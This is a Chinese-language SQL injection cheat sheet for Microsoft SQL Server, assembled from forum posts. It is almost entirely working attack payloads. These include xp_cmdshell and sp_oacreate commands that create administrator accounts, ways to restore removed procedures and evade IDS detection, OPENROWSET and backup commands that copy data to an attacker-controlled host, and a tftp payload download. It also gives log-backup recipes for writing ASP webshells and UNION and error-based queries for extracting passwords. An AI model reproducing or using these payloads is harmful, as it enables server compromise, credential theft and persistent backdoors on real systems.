sql注入语句大全

sql注入语句大全
--是否存在xp_cmdshell 
and 1=(select count(*) from master.dbo.sysobjects where xtype = 'x' and name = 'xp_cmdshell') 

--用xp_cmdshell执行命令 
;exec master..xp_cmdshell "net user name password /add"-- 
;exec master..xp_cmdshell "net localgroup name administrators /add"-- 

--查看权限 
and (select IS_SRVROLEMEMBER('sysadmin'))=1--  //sa 
and (select IS_MEMBER('db_owner'))=1--   //  dbo 
and (select IS_MEMBER('public'))=1--  //public 

--创建个登陆mssql的帐号 
;exec master.dbo.sp_addlogin name,pass;-- 

--把创建的mssql登陆帐号提升到sysadmin 
;exec master.dbo.sp_addsrvrolemember name,sysadmin;--
有用的扩展 

--获得MS SQL的版本号  //mssql版本 
execute master..sp_msgetversion   // dbo public 

--得到硬盘文件信息             //dbo public 
--参数说明:目录名,目录深度,是否显示文件 //读取磁盘目录和文件 
execute master..xp_dirtree 'c:' //列出所有c:\文件和目录,子目录 
execute master..xp_dirtree 'c:',1 //只列c:\文件夹 
execute master..xp_dirtree 'c:',1,1 //列c:\文件夹加文件 

--列出服务器上所有windows本地组 
execute master..xp_enumgroups //dbo 

--得到当前sql server服务器的计算机名称 //获得计算机名   
execute master..xp_getnetname   //dbo public 

--列出指定目录的所有下一级子目录 
EXEC [master].[dbo].[xp_subdirs] 'c:\WINNT' //可以列目录 

--列出服务器上固定驱动器,以及每个驱动器的可用空间 
execute master..xp_fixeddrives   //dbo public 

--显示系统上可用的盘符 
execute master..xp_availablemedia   //dbo 

--获取某文件的相关属性 
execute master..xp_getfiledetails 'C:1.txt'  //dbo public 

--统计数据库里每个表的详细情况 
exec sp_MSforeachtable 'sp_spaceused ''?''' //查询表 //dbo public 

--获得每个表的记录数和容量 
exec sp_MSforeachtable 'select ''?''','?', 'sp_spaceused ''?''', 'SELECT count(*) FROM ? '  //dbo pubilc 

--更新Table1/Table2中note列为NULL的值 
sp_MSforeachtable 'Update ? Set note='''' Where note is null',null,null,null,' AND o.name in (''Table1'',''Table2'') 

--列出服务器域名 
xp_ntsec_enumdomains //机器名 //dbo public 

--停止或者启动某个服务 
xp_servicecontrol 'stop','schedule' //schedule是服务得名称  //dbo 

--用pid来停止某个执行中的程序 
xp_terminate_process 123 //123是pid //dbo 

--只列某个目录下的子目录 
dbo.xp_subdirs 'C:' //dbo 

--服务器安全模式信息 
xp_loginconfig  //dbo 


xp_regaddmultistring 
xp_regdeletekey 
xp_regdeletevalue 
xp_regenumkeys 
xp_regenumvalues 
xp_regread 
xp_regremovemultistring 
xp_regwrite 

--将新扩展存储过程的名称注册到 Microsoft? SQL Server? 上。 
sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll' //恢复xp_cmdshell 

恢复过程sp_addextendedproc 如下： 
create procedure sp_addextendedproc --- 1996/08/30 20:13 
@functname nvarchar(517),/* (owner.)name of function to call */ 
@dllname varchar(255)/* name of DLL containing function */ 
as 
set implicit_transactions off 
if @@trancount > 0 
begin 
raiserror(15002,-1,-1,'sp_addextendedproc') 
return (1) 
end 
dbcc addextendedproc( @functname, @dllname) 
return (0) -- sp_addextendedproc 

创建新的 Microsoft? SQL Server? 登录//只有 sysadmin 和 securityadmin 固定服务器角色的成员才可以执行 sp_addlogin。 





补丁版本 
   其中的8.00.760就是SQL Server的版本和补丁号。对应关系如下： 


    8.00.194 －——————SQL Server 2000 RTM 
    8.00.384 －——————(SP1) 
    8.00.534 －——————(SP2) 
    8.00.760 －——————(SP3)
在db权限并且分离获取mssql数据库服务器ip的方法 

1.本地nc监听  nc -vvlp 80 

2.;insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=xxx;Network=DBMSSOCN;Address=你的ip,80;', 'select * from dest_table') select * from src_table;-- 

其他的都不用管
xp_cmdshell的删除及恢复 


恢复xp_cmdshell的方法   
删除扩展存储过过程xp_cmdshell的语句   
exec sp_dropextendedproc ’xp_cmdshell’   

恢复cmdshell的sql语句   
exec sp_addextendedproc xp_cmdshell ,@dllname =’xplog70.dll’   

exec master.dbo.addextendedproc ’xp_cmdshell’,’xplog70.dll’;select count(*) from master.dbo.sysobjects where xtype=’x’ and   
返回结果为1就ok   

否则需上传c:\inetput\web\xplog70.dll后   
exec master.dbo.sp_addextendedproc ’xp_cmdshell’,’c:\inetput\web\xplog70.dll’;--   

如果是用以下方法删除   
drop procedure sp_addextendedproc   
drop procedure sp_oacreate   
exec sp_dropextendedproc ’xp_cmdshell’   

则可以用以下语句恢复   
dbcc addextendedproc ("sp_oacreate","odsole70.dll")   
dbcc addextendedproc ("xp_cmdshell","xplog70.dll")   
这样可以直接恢复，不用去管sp_addextendedproc是不是存在
去掉tenlnet的ntlm认证 

;exec master.dbo.xp_cmdshell 'tlntadmn config sec = -ntlm'—
public权限列目录 

提起public权限的用户估计很多人也觉得郁闷了吧~N久以前看了一篇《论在mssql中public和db_owner权限下拿到webshell或是系统权限》的文章(名字真长-_-!!!),里面说到没办法利用xp_regread,xp_dirtree…这些存储过程,原因是public没有办法建表,我在这里矫正一下其实public是可以建表的~呵呵,使这些存储过程能利用上,看下面的代码吧 

--建立一个临时表,一般的表我们是无办法建立的,我们只能建立临时表 

create table ##nonamed( 

      dir ntext, 

      num int 

) 

--调用存储过程把执行回来的数据存到临时表里面 

insert ##nonamed execute master..xp_dirtree 'c:\',1 

--然后采用openrowset函数把临时表的数据导到本地MSSQL 的dirtree表里面了 

insert into openrowset('sqloledb', '192.0.0.1';'user';'pass', 'select * from Northwind.dbo.dirtree') 

select * from ##nonamed 

以上方法,也就是说public可以遍历用户服务器的目录
MSSQL自身存储过程的一个注入 

master..sp_resolve_logins存储过程中，对@dest_path参数过滤不严，导致xp_cmdshell注入。 

分析： 
SELECT @dest_path = RTRIM(LTRIM(@dest_path)) 

-- If the last char is '\', remove it. 
IF substring(@dest_path, len(@dest_path),1) = '\' 
SELECT @dest_path = substring(@dest_path, 1, len(@dest_path)-1) 

-- Don't do validation if it is a UNC path due to security problem. 
-- If the server is started as a service using local system account, we 
-- don't have access to the UNC path. 
IF substring(@dest_path, 1,2) <> '\\' 
BEGIN 
SELECT @command = 'dir "' + @dest_path + '"' 
exec @retcode = master..xp_cmdshell @command, 'no_output' 
IF @@error <> 0 
RETURN (1) 
IF @retcode <> 0 
BEGIN 
raiserror (14430, 16, -1, @dest_path) 
RETURN (1) 
END 
END 

master..sp_resolve_logins存储过程 在这一段，经过一定的判断，对 @dest_path 进行了一定的过滤。 
但是没有过滤"（双引号）导致了 xp_cmdshell执行任意SQL语句 

测试代码： 
EXEC sp_resolve_logins 'text', 'e:\asp\"&net user admina admin /add&net localgroup administrators admina /add&dir "e:\asp', '1.asp' 
执行上述MSSQL语句，成功添加了一个名为admina的系统帐号 

但是此存储过程代码中经过判断，需要系统systemadmin权限的帐号
Re:沙盒
通常一台MSSQL服务器同时支持Access数据库,所以只要有一个sa或者dbowner的连接(至少对master库具有db_owner权限，默认情况下是没有的),就满足了修改注册表的条件,因为MSSQL有一个名为xp_regwrite的扩展,它的作用是修改注册表的值.语法如下 
exec maseter.dbo.xp_regwrite Root_Key,SubKey,Value_Type,Value 
如果存在一个sa或者dbowner的连接的SQL注入点,就可以构造出如下注入语句InjectionURL;EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SoftWare\Microsoft\Jet\4.0\Engine','SandBoxMode','REG_DWORD','0'--那我们将SandBoxMode开关的注册表值修改为0就成功了.接着连接到一个Access数 据库中,就可以执行系统命令,当然执行系统命令我们只需要一个Access数据库相关Select的注入点或者直接用ASP文件Select调用这个 VBA的shell()函数,但是实际上MSSQL有一个的OpenRowSet函数,它的作用是打开一个特殊的数据库或者连接到另一个数据库之中.当我 们有一个SA权限连接的时候,就可以做到打开Jet引擎连接到一个Access数据库,同时我们搜索系统文件会发现windows系统目录下本身就存在两 个Access数据库,位置在%windir%\system32\ias\ias.mdb或者%windir%\system32\ias\ dnary.mdb,这样一来我们又可以利用OpenRowSet函数构造出如下注入语句:InjectionURL';Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\winnt\system32\ias\ias.mdb','select shell("net user ray 123 /ad")');-- 
如果你觉得不大好懂的话，我可以给你做一个简化的理解：1，Access可以调用VBS的函数，以System权限执行任意命令2，Access执行这个命令是有条件的，需要一个开关被打开3，这个开关在注册表里4，SA是有权限写注册表的5，用SA写注册表的权限打开那个开关6，调用Access里的执行命令方法，以system权限执行任意命令执行SQL命令，执行了以下命令：EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SoftWare\Microsoft\Jet\4.0\Engine','SandBoxMode','REG_DWORD','0'Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\windows\system32\ias\ias.mdb','select shell("net user zyqq 123 /add")');Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\windows\system32\ias\ias.mdb','select shell("net localgroup administrators 
'group by users.id having 1=1-- 
'group by users.id, users.username, users.password, users.privs having 1=1-- 
'; insert into users values( 666, 'attacker', 'foobar', 0xffff )-- 

UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='logintable'- 
UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='logintable' WHERE COLUMN_NAME NOT IN ('login_id')- 
UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='logintable' WHERE COLUMN_NAME NOT IN ('login_id','login_name')- 
UNION SELECT TOP 1 login_name FROM logintable- 
UNION SELECT TOP 1 password FROM logintable where login_name='Rahul'-- 

看服务器打的补丁=出错了打了SP4补丁 
and 1=(select @@VERSION)-- 

看数据库连接账号的权限，返回正常，证明是服务器角色sysadmin权限。 
and 1=(SELECT IS_SRVROLEMEMBER('sysadmin'))-- 

判断连接数据库帐号。（采用SA账号连接 返回正常=证明了连接账号是SA） 
and 'sa'=(SELECT System_user)-- 
and user_name()='dbo'-- 
and 0<>(select user_name()-- 

看xp_cmdshell是否删除 
and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE xtype = 'X' AND name = 'xp_cmdshell')-- 

xp_cmdshell被删除，恢复,支持绝对路径的恢复 
;EXEC master.dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll'-- 
;EXEC master.dbo.sp_addextendedproc 'xp_cmdshell','c:\inetpub\wwwroot\xplog70.dll'-- 

反向PING自己实验 
;use master;declare @s int;exec sp_oacreate "wscript.shell",@s out;exec sp_oamethod @s,"run",NULL,"cmd.exe /c ping 192.168.0.1";-- 

加帐号 
;DECLARE @shell INT EXEC SP_OACREATE 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user jiaoniang$ 1866574 /add'-- 

创建一个虚拟目录E盘： 
;declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', NULL,' cscript.exe c：\inetpub\wwwroot\mkwebdir.vbs -w "默认Web站点" -v "e","e：\"'-- 

访问属性：（配合写入一个webshell） 
declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', NULL,' cscript.exe c：\inetpub\wwwroot\chaccess.vbs -a w3svc/1/ROOT/e +browse' 

爆库 特殊技巧：:%5c='\' 或者把/和\ 修改%5提交 
and 0<>(select top 1 paths from newtable)-- 

得到库名（从1到5都是系统的id，6以上才可以判断） 
and 1=(select name from master.dbo.sysdatabases where dbid=7)-- 
and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and dbid=6) 
依次提交 dbid = 7,8,9.... 得到更多的数据库名 

and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype='U') 暴到一个表 假设为 admin 
and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype='U' and name not in ('Admin')) 来得到其他的表。 
and 0<>(select count(*) from bbs.dbo.sysobjects where xtype='U' and name='admin' 
and uid>(str(id))) 暴到UID的数值假设为18779569 uid=id 
and 0<>(select top 1 name from bbs.dbo.syscolumns where id=18779569) 得到一个admin的一个字段,假设为 user_id 
and 0<>(select top 1 name from bbs.dbo.syscolumns where id=18779569 and name not in 
('id',...)) 来暴出其他的字段 
and 0<(select user_id from BBS.dbo.admin where username>1) 可以得到用户名 
依次可以得到密码。。。。。假设存在user_id username ,password 等字段 

and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and dbid=6) 
and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype='U') 得到表名 
and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype='U' and name not in('Address')) 
and 0<>(select count(*) from bbs.dbo.sysobjects where xtype='U' and name='admin' and uid>(str(id))) 判断id值 
and 0<>(select top 1 name from BBS.dbo.syscolumns where id=773577794) 所有字段 

?id=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,* from admin 
?id=-1 union select 1,2,3,4,5,6,7,8,*,9,10,11,12,13 from admin (union，access也好用) 

得到WEB路径 
;create table [dbo].[swap] ([swappass][char](255));-- 
and (select top 1 swappass from swap)=1-- 
;CREATE TABLE newtable(id int IDENTITY(1,1),paths varchar(500)) Declare @test varchar(20) exec master..xp_regread @rootkey='HKEY_LOCAL_MACHINE', @key='SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\Virtual Roots\', @value_name='/', values=@test OUTPUT insert into paths(path) values(@test)-- 
;use ku1;-- 
;create table cmd (str image);-- 建立image类型的表cmd 

存在xp_cmdshell的测试过程： 
;exec master..xp_cmdshell 'dir' 
;exec master.dbo.sp_addlogin jiaoniang$;-- 加SQL帐号 
;exec master.dbo.sp_password null,jiaoniang$,1866574;-- 
;exec master.dbo.sp_addsrvrolemember jiaoniang$ sysadmin;-- 
;exec master.dbo.xp_cmdshell 'net user jiaoniang$ 1866574 /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add';-- 
;exec master.dbo.xp_cmdshell 'net localgroup administrators jiaoniang$ /add';-- 
exec master..xp_servicecontrol 'start', 'schedule' 启动服务 
exec master..xp_servicecontrol 'start', 'server' 
; DECLARE @shell INT EXEC SP_OACREATE 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C：\WINNT\system32\cmd.exe /c net user jiaoniang$ 1866574 /add' 
;DECLARE @shell INT EXEC SP_OACREATE 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C：\WINNT\system32\cmd.exe /c net localgroup administrators jiaoniang$ /add' 
'; exec master..xp_cmdshell 'tftp -i youip get file.exe'-- 利用TFTP上传文件 

;declare @a sysname set @a='xp_'+'cmdshell' exec @a 'dir c:\' 
;declare @a sysname set @a='xp'+'_cm’+’dshell' exec @a 'dir c:\' 
;declare @a;set @a=db_name();backup database @a to disk='你的IP你的共享目录bak.dat' 
如果被限制则可以。 
select * from openrowset('sqloledb','server';'sa';'','select ''OK!'' exec master.dbo.sp_addlogin hax') 

查询构造： 
SELECT * FROM news WHERE id=... AND topic=... AND ..... 
admin'and 1=(select count(*) from [user] where username='victim' and right(left(userpass,01),1)='1') and userpass <>' 
select 123;-- 
;use master;-- 
:a' or name like 'fff%';-- 显示有一个叫ffff的用户哈。 
and 1<>(select count(email) from [user]);-- 
;update [users] set email=(select top 1 name from sysobjects where xtype='u' and status>0) where name='ffff';-- 
;update [users] set email=(select top 1 id from sysobjects where xtype='u' and name='ad') where name='ffff';-- 
';update [users] set email=(select top 1 name from sysobjects where xtype='u' and id>581577110) where name='ffff';-- 
';update [users] set email=(select top 1 count(id) from password) where name='ffff';-- 
';update [users] set email=(select top 1 pwd from password where id=2) where name='ffff';-- 
';update [users] set email=(select top 1 name from password where id=2) where name='ffff';-- 
上面的语句是得到数据库中的第一个用户表,并把表名放在ffff用户的邮箱字段中。 
通过查看ffff的用户资料可得第一个用表叫ad 
然后根据表名ad得到这个表的ID 得到第二个表的名字 

insert into users values( 666, char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73), char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73), 0xffff)-- 
insert into users values( 667,123,123,0xffff)-- 
insert into users values ( 123, 'admin''--', 'password', 0xffff)-- 
;and user>0 
;and (select count(*) from sysobjects)>0 
;and (select count(*) from mysysobjects)>0 //为access数据库 

枚举出数据表名 
;update aaa set aaa=(select top 1 name from sysobjects where xtype='u' and status>0);-- 
这是将第一个表名更新到aaa的字段处。 
读出第一个表，第二个表可以这样读出来（在条件后加上 and name<>'刚才得到的表名'）。 
;update aaa set aaa=(select top 1 name from sysobjects where xtype='u' and status>0 and name<>'vote');-- 
然后id=1552 and exists(select * from aaa where aaa>5) 
读出第二个表，一个个的读出，直到没有为止。 
读字段是这样： 
;update aaa set aaa=(select top 1 col_name(object_id('表名'),1));-- 
然后id=152 and exists(select * from aaa where aaa>5)出错，得到字段名 
;update aaa set aaa=(select top 1 col_name(object_id('表名'),2));-- 
然后id=152 and exists(select * from aaa where aaa>5)出错，得到字段名 

[获得数据表名][将字段值更新为表名，再想法读出这个字段的值就可得到表名] 
update 表名 set 字段=(select top 1 name from sysobjects where xtype=u and status>0 [ and name<>'你得到的表名' 查出一个加一个]) [ where 条件] select top 1 name from sysobjects where xtype=u and status>0 and name not in('table1','table2',…) 
通过SQLSERVER注入漏洞建数据库管理员帐号和系统管理员帐号[当前帐号必须是SYSADMIN组] 

[获得数据表字段名][将字段值更新为字段名，再想法读出这个字段的值就可得到字段名] 
update 表名 set 字段=(select top 1 col_name(object_id('要查询的数据表名'),字段列如:1) [ where 条件] 

绕过IDS的检测[使用变量] 
;declare @a sysname set @a='xp_'+'cmdshell' exec @a 'dir c:\' 
;declare @a sysname set @a='xp'+'_cm’+’dshell' exec @a 'dir c:\' 

1、 开启远程数据库 
基本语法 
select * from OPENROWSET('SQLOLEDB', 'server=servername;uid=sa;pwd=123', 'select * from table1' ) 
参数: (1) OLEDB Provider name 
2、 其中连接字符串参数可以是任何端口用来连接,比如 
select * from OPENROWSET('SQLOLEDB', 'uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;', 'select * from table' 
3.复制目标主机的整个数据库insert所有远程表到本地表。 
基本语法： 
insert into OPENROWSET('SQLOLEDB', 'server=servername;uid=sa;pwd=123', 'select * from table1') select * from table2 
这行语句将目标主机上table2表中的所有数据复制到远程数据库中的table1表中。实际运用中适当修改连接字符串的IP地址和端口，指向需要的地方，比如： 
insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;','select * from table1') select * from table2 
insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;','select * from _sysdatabases') 
sele
Re:log备份的总结
当SQL注入是得到DB权限时候，接下来可以做的工作很多，象找管理员密码，后台管理这些都可以帮助你拿到WEBSHELL,但是这篇文章讲的是log备份,LOG备份出来的小马的体积小,而且备份的成功的可性很大，所以是我作为对DB权限的第一种试探方法. 
但是在LOG备份中,我们经常会遇到一些很让我们头痛的问题,那就是闭合的问题，我在这里做个总结，也 
好让我们对不能闭合的方法有一个全面的了解. 
1.先介绍下LOG备份，这个相信大家都很熟悉了，我还是习惯在IE里直接提交，返回正常的页面就说这一步的操作就成功了，如果没有返回正常的页面，我们就可以根据IE返回的错误来找他的原因.(这里说下要将IE的错误提示给打开),LOG的格式如下所示: 
http://www.site.com/xx.asp?id=xxx;alter database databasename set RECOVERY FULL 
http://www.site.com/xx.asp?id=xxx;create table cmd (a image)-- 
http://www.site.com/xx.asp?id=xxx;backup log databasename to disk = 'c:\cmd' with init 
http://www.site.com/xx.asp?id=xxx;insert into cmd (a) values ('<%%25Execute(request("go"))% 

%25>')-- 
http://www.site.com/xx.asp?id=xxx;backup log databasename to disk = 'x:\xxx\xxx\asp1.asp'-- 
http://www.site.com/xx.asp?id=xxx;drop table cmd-- 

分为6步操作,最容易出错的就是第4步的操作，经常返回没有闭合的问题，下面就是一些我们可以将 
values中的内容可以进行更换的方式,当我们的一种方式不行的话，就可以换另一种方式，当所有的方式 
都换完了，没有什么好说的，要么就放弃，要么就换另一种方式继续，想列目录找数据库下载，后台.这 
里就不多说了，可以提换的内容有: 
a).<%%25Execute(request("go"))%%25> 
b).<%Execute(request("go"))%> 
c).%><%execute request("go")%><% 
d).<script language=VBScript runat=server>execute request("sb")</Script> 
e).<%25Execute(request("l"))%25> 

2.LOG备份要注意的一些问题: 
a).要注意你现在的机器是不是WEB主机,简单的方法就是翻他的目录，看有没有IIS安装的文件 
b).当你确定你要找的确实是WEN主机时，就可以找他的站点目录了,这个也很重要，是步骤5的操作，如果备份到一个错误的目录，当然就没有办法访问了 
c).备份成功后，你就可以试着用客户端去连接，这个地方也有人弄错，现在用的字段是go,你的客户端的 
相关字段也为go 
d).用ececute正常备份出来的是用错误提示的，当你的显示500错误时，请你将的IE错误提示打开，当显示 
Microsoft VBScript 运行时错误 错误 '800a000d' 

类型不匹配: 'execute' 
时候表示你已经成功了，连接吧!! 
e).还有极端的时候你备份出来的一句话被杀(当你确定你确实是备份在WEB主机的对应目录是),你可以将 

上面的VALUES字段中的值做几个大小写转换，一般是没有问题的.. 
------------------------------------------------------------------------ 
今天测试log备份获取WEBSEHLL遇到点问题，首先说下我自己理解通过log备份和差异备份的区别（不对和不完善的请大家指出与补充）。LOG备份得到的WEBSHELL文件小，大大增加了成功率。避免了数据库里有特殊字符备份不成功的情况。今天在测试是没成功,备份出来没有一句话马，功能失去了，也就没有任何意义了。提交上来讨论下错误之处。 
由于是议题讨论。用了真实地址，请勿破坏！ 
以下是我的语句： 
引用内容 
;alter database dweb set RECOVERY FULL-- 
;create table cmd (a image)-- 
;backup log dweb to disk = ‘c:\Sammy‘ with init-- 
;insert into cmd (a) values (‘0x3C256576616C20726571756573742822732229253E‘)-- 
;backup log dweb to disk = ‘d:\chen\s2.asp‘-- 

备份结果 
http://www.site.com/s2.asp 
十六进制形式备份出来了！ 
我再用如下语句！ 引用内容 
;Drop table [cmd]-- 
;alter database dweb set RECOVERY FULL-- 
;create table cmd (a image)-- 
;backup log dweb to disk = ‘c:\Sammy‘ with init-- 
;insert into cmd (a) values (‘<%eval request("s")%>‘)-- 
;backup log dweb to disk = ‘d:\chen\sssjjk.asp‘-- 

如果又如下 
http://www.site.com/sssjjk.asp 

是何原因使LOG备份不成功呢？ 


是因为数据表没有写到你备份的数据库当中,导致备份的ASP文件中没有写入我们希望的一句话木马，请在和数据表操作相关的语句中加入数据库名，如：create table dweb.dbo.[cmd] (a image)--，然后再执行备份语句就可以成功了 

呵呵,你把马改成"<%%25Execute(request("s"))%%25>" 来试试.. 

注意,是加个.%25 

问题已解决，把语句换成！ 
;insert into cmd (a) values (‘<%%25eval request("s")%%25>‘)-- 
确实能成功！谢谢！ 

;insert into cmd (a) values (‘0x3C256576616C20726571756573742822732229253E‘)-- 
楼主的这句是写 字符串 “0x3C256576616C20726571756573742822732229253E”到文件里 而不是木马 
把单引号去掉就可以了 
insert into cmd (a) values (0x3C256576616C20726571756573742822732229253E)-- 

………………………………………………………………………………………………………… 
Blog被人渗透了一下，不知道各位掉了什么东西没有。原来有一次blog的目录可以列出来，那次我掉了一个小东西，然后今天别人告诉我NBSI 3用了那个东西的方法……呵呵，有点晕，就是下面的，成功率还是很高的，大家可以试试看。嗯，方法流出去无所谓，文章留着吧。 

　　dbowner通过注射得到一个shell应该不是什么难事情了，比较麻烦的是就算利用增量备份，仍然有很多不确定的因素，如果之前别人有过什么错误的写入信息，可能备份出来得到的还是一些不能用的500错误，如何能够提高成功率及重用性呢？如果单从调整增量备份的方式来看，尽管能够达到一些效果，但是方法比较复杂而且效果不明显。加上关于重用性的考虑，例如多次备份的成功率，backup database的方法并不太适用。这里将要讲述的是另外一个备份的方法，导出日志文件到web目录来获得shell。 

　　饭要一口一口的吃，技术问题也要一个一个的解决，得到webshell首先要知道物理路径，然后才能说其他的。关于物理路径的暴露有很多方法，注入也可以得到，这点nbsi2已经做到了，就不再多说。值得注意的是，如果数据库和web分离，这样肯定得不到webshell，备份出来的东西可以覆盖任何文件，一些关于开始菜单的想法还是有效的，只要注意扩展名就好。扯远了，反正如果数据库和web在一块的，你就有机会，反之还是想其他的办法吧。 

　　然后你要得到当前的权限和数据库名。如果是sysadmin当然没有必要做很复杂的事情，dbowner足矣，public则不行。当前打开的库名用一个db_name()就可以得到，同样很简单。 

　　默认的情况是，一般选择的数据库故障还原类型都是简单，这时候不能够对日志文件进行备份。然而我们都是dbowner了，还有什么不能做的呢，只要修改一下属性就可以。由于不能去企业管理器中修改，只有用一段SQL语句，很简单的，这样就可以： 

　　alter database XXXX set RECOVERY FULL 

　　其中XXXX是你得到的数据库的名字，执行过后就可以备份日志了。这种修改是破坏性的，因为你不知道以前的故障还原模式是什么，细心的管理员看到异样，可能就要开始起疑心。如果之前你能得到数据库的状态，最好还是在备份完以后把这个数据库的属性改回来。 

　　剩下的事情就是怎样让数据库用最原始的方式记录下你的数据了。这一点和backup database中设定表名为image的问题相对应，如果你只是建立一个之类的表，日志里面的记录还是以松散的格式记录的，也就是< % % >，没有任何效果。通过实际的测试，发现还是可以通过与backup database类似的方式记录进去，如下： 

　　create table cmd (a image) 

　　insert into cmd (a) values (’’) 

　　backup log XXXX to disk = ’c:\xxx\2.asp’ 

　　这样你已经得到一个webshell了。 

　　到这里就完了么？没有，呵呵，我们继续。 

到这里有两个分支方向，第一个，让注入的时候不出现单引号，太简单了，我都懒得写；第二个，减小这个webshell的长度以及提高成功率。下面的方法就是讨论第二个分支问题的，同样适用于backup database的减小。 

　　首先是初始化这个日志。 

　　backup log XXXX to disk = ’c:\caonima’ with init 

　　这样有点类似于增量备份的第一步，不过有点不同的是，你做了这个以后，你备份出来的可用的shell是固定的。这一点比较重要，因为有了这一步，不管管理员在数据库里面做了什么扰乱你back database的手脚，或者你之前有多少混蛋（你肯定会这么想的）弄了些你不喜欢的东西，都没有关系，甚至你做过以后，别人在后面再按照你的方法来一次，还是会成功，这对于偶尔出现的反复，比如对方机器重装但是数据库和代码没变，有不小的帮助。 

　　然后是调整一下backup中各个语句的顺序。通过第一点，大概的步骤已经确定下来了，那就是： 
  引用内容 
　 
　　alter database XXXX set RECOVERY FULL 

　　backup log XXXX to disk = ’c:\Sammy’ with init 

　　create table cmd (a image) 

　　insert into cmd (a) values (’’) 

　　backup log XXXX to disk = ’c:\xxx\2.asp’ 
　 
　　这样不好，感觉上多了一条没用的东西。 

　　create table cmd (a image) 

　　确实有点讨厌，不过这句是必要的，只好调整一下位置，弄到其他地方去。调换一下顺序似乎还可以小一点，对于backup database中的增量情况同样是可以的，backup database甚至可以仅仅在update后马上备份，不过由于涉及到了数据的存储格式，情况很复杂，这里不讨论。调整后的是： 
  引用内容 
　　alter database XXXX set RECOVERY FULL 

　　create table cmd (a image) 

　　backup log XXXX to disk = ’c:\Sammy’ with init 

　　insert into cmd (a) values (’’) 

　　backup log XXXX to disk = ’c:\xxx\2.asp’ 

　　成功的话，备份出来的shell（上面的2.asp）有78.5k，文件长度固定的是80,384字节。很挑剔的朋友也可以接受了吧，当然用这个来生成一个干净的木马也可以——这本来就是顶端cs木马的s端，很通用的。
显示所有固定数据库角色的权限。 

EXEC sp_dbfixedrolepermission
Sql注射总结（早源于'or'1'='1） 
　　最重要的表名： 
　　select * from sysobjects 
　　sysobjects ncsysobjects 
　　sysindexes tsysindexes 
　　syscolumns 
　　systypes 
　　sysusers 
　　sysdatabases 
　　sysxlogins 
　　sysprocesses 
　　最重要的一些用户名（默认sql数据库中存在着的） 
　　public 
　　dbo 
　　guest(一般禁止，或者没权限) 
　　db_sercurityadmin 
　　ab_dlladmin 
　　一些默认扩展 
　　xp_regaddmultistring 
　　xp_regdeletekey 
　　xp_regdeletevalue 
　　xp_regenumkeys 
　　xp_regenumvalues 
　　xp_regread 
　　xp_regremovemultistring 
　　xp_regwrite 
　　xp_availablemedia 驱动器相关 
　　xp_dirtree 目录 
　　xp_enumdsn ODBC连接 
　　xp_loginconfig 服务器安全模式信息 
　　xp_makecab 创建压缩卷 
　　xp_ntsec_enumdomains domain信息 
　　xp_terminate_process 终端进程，给出一个PID 
　　例如： 
　　sp_addextendedproc 'xp_webserver', 'c:/temp/xp_foo.dll' 
　　exec xp_webserver 
　　sp_dropextendedproc 'xp_webserver' 
　　bcp "select * FROM test..foo" queryout c:/inetpub/wwwroot/runcommand.asp -c -Slocalhost -Usa -Pfoobar 
　　' group by users.id having 1=1- 
　　' group by users.id, users.username, users.password, users.privs having 1=1- 
　　'; insert into users values( 666, 'attacker', 'foobar', 0xffff )- 
　　union select TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME='logintable'- 
　　union select TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME='logintable' where COLUMN_NAME NOT IN ('login_id')- 
　　union select TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME='logintable' where COLUMN_NAME NOT IN ('login_id','login_name')- 
　　union select TOP 1 login_name FROM logintable- 
　　union select TOP 1 password FROM logintable where login_name='Rahul'-- 
　　构造语句：查询是否存在xp_cmdshell 
　　' union select @@version,1,1,1-- 
　　and 1=(select @@VERSION) 
　　and 'sa'=(select System_user) 
　　' union select ret,1,1,1 from foo-- 
　　' union select min(username),1,1,1 from users where username > 'a'- 
　　' union select min(username),1,1,1 from users where username > 'admin'- 
　　' union select password,1,1,1 from users where username = 'admin'-- 
　　and user_name()='dbo' 
　　and 0<>(select user_name()- 
